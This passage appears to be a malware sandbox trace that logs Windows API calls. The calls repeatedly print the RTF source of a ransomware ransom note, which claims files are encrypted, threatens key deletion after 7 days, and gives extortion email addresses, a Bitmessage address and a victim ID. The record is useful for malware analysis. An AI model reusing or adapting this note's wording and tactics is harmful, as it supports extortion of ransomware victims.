}}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0299.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0299.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick 